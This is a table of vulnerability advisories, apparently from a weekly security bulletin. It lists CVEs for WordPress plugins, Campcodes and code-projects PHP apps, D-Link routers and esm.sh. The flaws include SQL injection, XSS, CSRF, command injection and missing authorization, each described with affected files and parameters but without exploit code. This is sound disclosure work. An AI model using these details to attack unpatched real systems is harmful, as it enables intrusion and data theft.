| brainstormforce--SureForms Contact Form, Custom Form Builder, Calculator & More | The SureForms plugin for WordPress is vulnerable to Cross-Site Request Forgery Bypass in all versions up to, and including, 1.13.1. This is due to the plugin distributing generic WordPress REST API nonces (wp_rest) to unauthenticated users via the 'wp_ajax_nopriv_rest-nonce' action. While the plugin legitimately needs to support unauthenticated form submissions, it incorrectly uses generic REST nonces instead of form-specific nonces. This makes it possible for unauthenticated attackers to bypass CSRF protection on REST API endpoints that rely solely on nonce verification without additional authentication checks, allowing them to trigger unauthorized actions such as the plugin's own post-submission hooks and potentially other plugins' REST endpoints. | 2025-11-19 | 5.3 | CVE-2025-12535 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b083cf9d-bcfe-4234-a816-2d216da28b57?source=cve https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/background-process.php#L74 https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/admin-ajax.php#L45 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391762%40sureforms%2Ftrunk&old=3382423%40sureforms%2Ftrunk&sfp_email=&sfph_mail=   |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin_football.php. Manipulation of the argument product_image results in unrestricted upload. The attack can be carried out remotely. The exploit has been made public and could be used. | 2025-11-19 | 4.7 | CVE-2025-13411 | VDB-332938 \| Campcodes Retro Basketball Shoes Online Store admin_football.php unrestricted upload VDB-332938 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #693697 \| campcodes Retro Basketball Shoes Online Store V1.0 Unrestricted Upload https://github.com/laosijivul/cve/issues/2 https://www.campcodes.com/ |
| Campcodes--Retro Basketball Shoes Online Store | A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. The impacted element is an unknown function of the file /admin/admin_product.php. Manipulation of the argument product_image can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used. | 2025-11-19 | 4.7 | CVE-2025-13423 | VDB-332945 \| Campcodes Retro Basketball Shoes Online Store admin_product.php unrestricted upload VDB-332945 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696051 \| Campcodes Retro Basketball Shoes Online Store v1.0 Unrestricted Upload https://github.com/Abxery/cveee/issues/6 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A vulnerability has been found in Campcodes School Fees Payment Management System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_payment. Manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13269 | VDB-332604 \| Campcodes School Fees Payment Management System ajax.php sql injection VDB-332604 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690034 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/17 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A vulnerability was found in Campcodes School Fees Payment Management System 1.0. This affects an unknown function of the file /ajax.php?action=save_course. Manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-11-17 | 6.3 | CVE-2025-13270 | VDB-332605 \| Campcodes School Fees Payment Management System ajax.php sql injection VDB-332605 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690039 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/16 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A security flaw has been discovered in Campcodes School Fees Payment Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=delete_payment. Manipulation of the argument ID results in sql injection. The attack can be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13273 | VDB-332608 \| Campcodes School Fees Payment Management System ajax.php sql injection VDB-332608 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690048 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/20 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A weakness has been identified in Campcodes School Fees Payment Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=delete_fees. Manipulation of the argument ID can lead to sql injection. The attack may be performed remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13274 | VDB-332609 \| Campcodes School Fees Payment Management System ajax.php sql injection VDB-332609 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690886 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/21 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /manufacturer/edit_unit.php. Manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-11-17 | 6.3 | CVE-2025-13259 | VDB-332594 \| Campcodes Supplier Management System edit_unit.php sql injection VDB-332594 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #688780 \| campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber060/CVE/issues/1 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /manufacturer/edit_product.php. Manipulation of the argument cmbProductUnit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13260 | VDB-332595 \| Campcodes Supplier Management System edit_product.php sql injection VDB-332595 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689268 \| campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/1 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_product.php. Manipulation of the argument txtProductName leads to sql injection. The attack can be exploited remotely. The exploit has been disclosed to the public and may be used. | 2025-11-20 | 4.7 | CVE-2025-13424 | VDB-332946 \| Campcodes Supplier Management System add_product.php sql injection VDB-332946 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696053 \| campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/3 https://www.campcodes.com/ |
| code-projects--Courier Management System | A vulnerability was determined in code-projects Courier Management System 1.0. Affected by this issue is some unknown functionality of the file /search-edit.php. Manipulation of the argument Consignment causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 6.3 | CVE-2025-13303 | VDB-332642 \| code-projects Courier Management System search-edit.php sql injection VDB-332642 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691792 \| code-projects Courier Management System V1.0 SQL Injection https://github.com/labi1106/cve/issues/2 https://code-projects.org/ |
| code-projects--Courier Management System | A weakness has been identified in code-projects Courier Management System 1.0. This affects an unknown function of the file /add-office.php. Manipulation of the argument OfficeName causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-19 | 6.3 | CVE-2025-13396 | VDB-332924 \| code-projects Courier Management System add-office.php sql injection VDB-332924 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #692127 \| code-projects Courier Management System V1.0 SQL Injection https://github.com/beamyou/CVE/issues/1 https://code-projects.org/ |
| code-projects--Courier Management System | A vulnerability was identified in code-projects Courier Management System 1.0. This affects an unknown part of the file /add-new-officer.php. Manipulation of the argument ManagerName leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-11-17 | 4.7 | CVE-2025-13302 | VDB-332643 \| code-projects Courier Management System add-new-officer.php sql injection VDB-332643 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691791 \| code-projects Courier Management System V1.0 SQL Injection https://github.com/labi1106/cve/issues/1 https://code-projects.org/ |
| code-projects--Nero Social Networking Site | A vulnerability was found in code-projects Nero Social Networking Site 1.0. The affected element is an unknown function of the file /profilefriends.php. Manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-11-17 | 6.3 | CVE-2025-13279 | VDB-332614 \| code-projects Nero Social Networking Site profilefriends.php sql injection VDB-332614 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690963 \| code-projects Nero Social Networking Site 1.0 SQL Injection https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005 https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005/blob/main/report.md https://code-projects.org/ |
| code-projects--Simple Food Ordering System | A vulnerability has been found in code-projects Simple Food Ordering System 1.0. Affected by this issue is some unknown functionality of the file /saveorder.php. Manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13290 | VDB-332631 \| code-projects Simple Food Ordering System saveorder.php sql injection VDB-332631 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691619 \| code-projects Simple Food Ordering System 1.0 Unrestricted Upload https://github.com/liaoliao-hla/cve/issues/1 https://code-projects.org/ |
| code-projects--Simple Food Ordering System | A vulnerability was determined in code-projects Simple Food Ordering System 1.0. Affected by this issue is some unknown functionality of the file /listorder.php. Manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 6.3 | CVE-2025-13571 | VDB-333335 \| code-projects Simple Food Ordering System listorder.php sql injection VDB-333335 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698495 \| Code-Projects Simple Food Ordering System 1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr/issues/1 https://code-projects.org/ |
| codepeople--Appointment Booking Calendar | The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.96. This is due to the plugin exposing an unauthenticated booking processing endpoint (cpabc_appointments_check_IPN_verification) that trusts attacker-supplied payment notifications without verifying their origin, authenticity, or requiring proper authorization checks. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and insert them into the live calendar via the 'cpabc_ipncheck' parameter, triggering administrative and customer notification emails and disrupting operations. | 2025-11-22 | 5.3 | CVE-2025-13317 | https://www.wordfence.com/threat-intel/vulnerabilities/id/638217c4-7a37-49e4-8660-5510ace692ec?source=cve https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L14 https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L363 https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L476 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399113%40appointment-booking-calendar&new=3399113%40appointment-booking-calendar&sfp_email=&sfph_mail=   |
| codepeople--Booking Calendar Contact Form | The Booking Calendar Contact Form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.60. This is due to missing authorization checks and payment verification in the `dex_bccf_check_IPN_verification` function. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and bypass payment requirements via the 'dex_bccf_ipn' parameter. | 2025-11-22 | 5.3 | CVE-2025-13318 | https://www.wordfence.com/threat-intel/vulnerabilities/id/83b0ae2c-6b08-4b71-a728-c60722ec20c7?source=cve https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/tags/1.2.59/dex_bccf.php#L1409 https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/trunk/dex_bccf.php#L1409 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399906%40booking-calendar-contact-form&new=3399906%40booking-calendar-contact-form&sfp_email=&sfph_mail=   |
| codeyatri--Gutenify Visual Site Builder Blocks & Site Templates. | The Gutenify - Visual Site Builder Blocks & Site Templates. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block attributes in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-8605 | https://www.wordfence.com/threat-intel/vulnerabilities/id/853b86ca-0231-4b1c-b1d2-b8c23dbdc3c5?source=cve https://wordpress.org/plugins/gutenify/#developers   |
| coffeebite--Padlet Shortcode | The Padlet Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'key' parameter in the 'wallwisher' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12660 | https://www.wordfence.com/threat-intel/vulnerabilities/id/09989141-43ba-446c-8230-0485add7a1e2?source=cve https://wordpress.org/plugins/wallwisher-shortcode/ https://plugins.trac.wordpress.org/browser/wallwisher-shortcode/tags/1.3/wallwisher.php#L22   |
| cozmoslabs--User Profile Builder Beautiful User Registration Forms, User Profiles & User Role Editor | The User Profile Builder - Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wppb-embed shortcode in all versions up to, and including, 3.14.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-13054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3830ae19-cafc-40db-afde-2424cae23031?source=cve https://plugins.trac.wordpress.org/changeset/3397155/profile-builder   |
| cyberlord92--WP Login and Register using JWT | The WP Login and Register using JWT plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mo_jwt_generate_new_api_key' function in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to generate a new API key on sites that do not have an API key configured and subsequently use that key to access restricted endpoints. | 2025-11-19 | 4.3 | CVE-2025-12822 | https://www.wordfence.com/threat-intel/vulnerabilities/id/966523a4-3d4b-444b-b9d0-63c72527a99f?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397900%40login-register-using-jwt&new=3397900%40login-register-using-jwt&sfp_email=&sfph_mail= |
| D-Link--DWR-M920 | A security vulnerability has been detected in D-Link DWR-M920, DWR-M921, DIR-822K and DIR-825M 1.1.5. The affected function is system of the file /boafrm/formDebugDiagnosticRun. Manipulation of the argument host leads to command injection. The attack can be exploited remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 6.3 | CVE-2025-13306 | VDB-332646 \| D-Link DWR-M920/DWR-M921/DIR-822K/DIR-825M formDebugDiagnosticRun system command injection VDB-332646 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691813 \| D-Link DWR-M920 V1.1.5 Command Injection Submit #693805 \| D-Link DIR-822k TK_1.00_20250513164613 Command Injection (Duplicate) Submit #693807 \| D-Link DWR-M921 V1.1.50 Command Injection (Duplicate) Submit #695426 \| D-Link DIR-825m v1.1.12 Command Injection (Duplicate) https://github.com/LX-LX88/cve/issues/15 https://www.dlink.com/ |
| darto--Islamic Phrases | The Islamic Phrases plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phrases' shortcode attribute in all versions up to, and including, 2.12.2015. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11768 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e9bcc72-e434-4f6f-9e90-eec8cad31035?source=cve https://plugins.trac.wordpress.org/browser/islamic-phrases/tags/2.12.2015/islamic-phrases.php#L89   |
| davidangel--AudioTube | The AudioTube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' shortcode attribute of the 'audiotube' shortcode in all versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11801 | https://www.wordfence.com/threat-intel/vulnerabilities/id/258a2d5d-a176-4b89-bc4c-089d072982dd?source=cve https://plugins.trac.wordpress.org/browser/audiotube/tags/0.0.3/index.php#L64   |
| denishua--Top Friends | The Top Friends plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3. This is due to missing nonce validation on the top_friends_options_subpanel() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-12827 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8165196d-0117-473f-8ccf-57ffd3e08e16?source=cve https://plugins.trac.wordpress.org/browser/top-friends/tags/0.3/top-friends.php#L155   |
| DependencyTrack--frontend | @dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6. | 2025-11-17 | 4.8 | CVE-2025-64758 | https://github.com/DependencyTrack/frontend/security/advisories/GHSA-7xvh-c266-cfr5 https://github.com/DependencyTrack/frontend/pull/1378 https://github.com/DependencyTrack/frontend/pull/986 https://github.com/DependencyTrack/frontend/commit/8fd757be612eaf4f35eadbe4c334204d7bd711be   |
| developdaly--Stock Tools | The Stock Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'image_height' and 'image_width' shortcode attributes in all versions up to, and including, 1.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11765 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1d852dba-39ea-4cc9-9fcf-7f2ac3e1b5d0?source=cve https://plugins.trac.wordpress.org/browser/stock-tools/tags/1.1/stock-tools.php#L67   |
| devitemsllc--HT Mega Absolute Addons For Elementor | The HT Mega - Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Gutenberg blocks in all versions up to, and including, 3.0.0 due to insufficient input validation on user-supplied HTML tag names. This is due to the lack of a tag name whitelist allowing dangerous tags like 'script', 'iframe', and 'object' to be injected even though tag_escape() is used for sanitization. While some blocks use esc_html() for content, this can be bypassed using JavaScript encoding techniques (unquoted strings, backticks, String.fromCharCode()). This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-13141 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8bf04325-e313-4a68-89a0-b560bdef5a14?source=cve https://plugins.trac.wordpress.org/changeset/3398480/   |
| devsmip--BigBuy Dropshipping Connector for WooCommerce | The BigBuy Dropshipping Connector for WooCommerce plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 2.0.5 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to retrieve the output of phpinfo(). | 2025-11-21 | 5.3 | CVE-2025-12039 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19a3d5a5-4673-41e7-9868-99699852f330?source=cve https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L225 https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L260   |
| dfactory--Responsive Lightbox & Gallery | The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.3 via the 'get_image_size_by_url' function. This is due to insufficient validation of user-supplied URLs when determining image dimensions for gallery items. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services. | 2025-11-19 | 5.4 | CVE-2025-12359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f4c0bd6-f289-4a52-ac11-345076c32d84?source=cve https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-frontend.php#L1531 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-fast-image.php#L25 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/functions.php#L108 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-galleries.php#L3648 https://research.cleantalk.org/cve-2025-12359 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397940%40responsive-lightbox%2Ftrunk&old=3358021%40responsive-lightbox%2Ftrunk&sfp_email=&sfph_mail=   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext database account credentials from the system frontend. | 2025-11-17 | 4.9 | CVE-2025-13163 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext credentials of AD and system mail from the system frontend. | 2025-11-17 | 4.9 | CVE-2025-13164 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Dreampie--Resty | A security vulnerability has been detected in Dreampie Resty up to 1.3.1.SNAPSHOT. This affects the function Request of the file /resty-httpclient/src/main/java/cn/dreampie/client/HttpClient.java of the component HttpClient Module. Manipulation of the argument filename leads to path traversal. The attack may be performed remotely. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 5.6 | CVE-2025-13435 | VDB-332979; Dreampie Resty HttpClient HttpClient.java request path traversal VDB-332979; CTI Indicators (IOB, IOC, TTP, IOA) Submit #687603; Dreampie Resty Framework - HttpClient Module 1.3.1.SNAPSHOT Path Traversal / Directory Traversal (CWE-22) https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md   |
| Dromara--dataCompare | A flaw has been found in Dromara dataCompare up to 1.0.1. The affected element is the function DbConfig of the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java of the component JDBC URL Handler. Manipulation can lead to injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-11-17 | 6.3 | CVE-2025-13268 | VDB-332603; Dromara dataCompare JDBC URL DbconfigServiceImpl.java DbConfig injection VDB-332603; CTI Indicators (IOB, IOC, TTP, IOA) Submit #689460; dromara dataCompare 1.0.1 Improper Input Validation https://github.com/dromara/dataCompare/issues/13   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role. | 2025-11-21 | 5.3 | CVE-2025-10054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07c92f79-94ac-4153-9ab2-9608601508b0?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L77 https://plugins.trac.wordpress.org/changeset/3399391/   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.2.9 via the 'eh_crm_ticket_single_view_client' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of all support tickets. | 2025-11-21 | 4.3 | CVE-2025-10039 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9ffc0af-9c3d-4f8e-ae0b-e51c0c67dfe1?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions.php#L259 https://plugins.trac.wordpress.org/changeset/3391342/   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_settings_restore_trash' AJAX endpoint in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to restore all deleted tickets. | 2025-11-21 | 4.3 | CVE-2025-12022 | https://www.wordfence.com/threat-intel/vulnerabilities/id/982b23c5-2414-48f7-a2f5-96fef54f8d69?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-archive-ajax-functions.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eh_crm_restore_data() function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to restore tickets. | 2025-11-21 | 4.3 | CVE-2025-12023 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4599b145-cb89-48d4-8581-e1ee7a7bd323?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_settings_empty_trash' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to empty the ticket trash. | 2025-11-21 | 4.3 | CVE-2025-12085 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89696d1c-8e6e-402a-9d7a-03fe0f364a72?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_eh_crm_settings_empty_scheduled_actions' AJAX Action in all versions up to, and including, 3.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the scheduled triggers option. | 2025-11-21 | 4.3 | CVE-2025-12169 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae2ac493-e6df-4083-8601-65635ad342b2?source=cve https://plugins.trac.wordpress.org/changeset/3391816   |
| elextensions--WSChat WordPress Live Chat | The WSChat - WordPress Live Chat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'reset_settings' AJAX endpoint in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings. | 2025-11-19 | 4.3 | CVE-2025-12751 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0be6658d-aec8-404c-a994-bde10a3cdbac?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395773%40wschat-live-chat&new=3395773%40wschat-live-chat&sfp_email=&sfph_mail=   |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for modern web development. Prior to version 136, the esm.sh CDN service contains a Template Literal Injection vulnerability (CWE-94) in its CSS-to-JavaScript module conversion feature. When a CSS file is requested with the ?module query parameter, esm.sh converts it to a JavaScript module by embedding the CSS content directly into a template literal without proper sanitization. An attacker can inject malicious JavaScript code using ${...} expressions within CSS files, which will execute when the module is imported by victim applications. This enables Cross-Site Scripting (XSS) in browsers and Remote Code Execution (RCE) in Electron applications. This issue has been patched in version 136. | 2025-11-19 | 6.1 | CVE-2025-65026 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-hcpf-qv9m-vfgp https://github.com/esm-dev/esm.sh/commit/87d2f6497574bf4448641a5527a3ac2beba5fd6c   |
| etruel--WP Delete Post Copies | The WP Delete Post Copies plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-21 | 4.4 | CVE-2025-12066 | https://www.wordfence.com/threat-intel/vulnerabilities/id/92ab1f56-5ca6-48e8-b380-ac2e302d63d2?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394571%40etruel-del-post-copies&new=3394571%40etruel-del-post-copies&sfp_email=&sfph_mail=   |
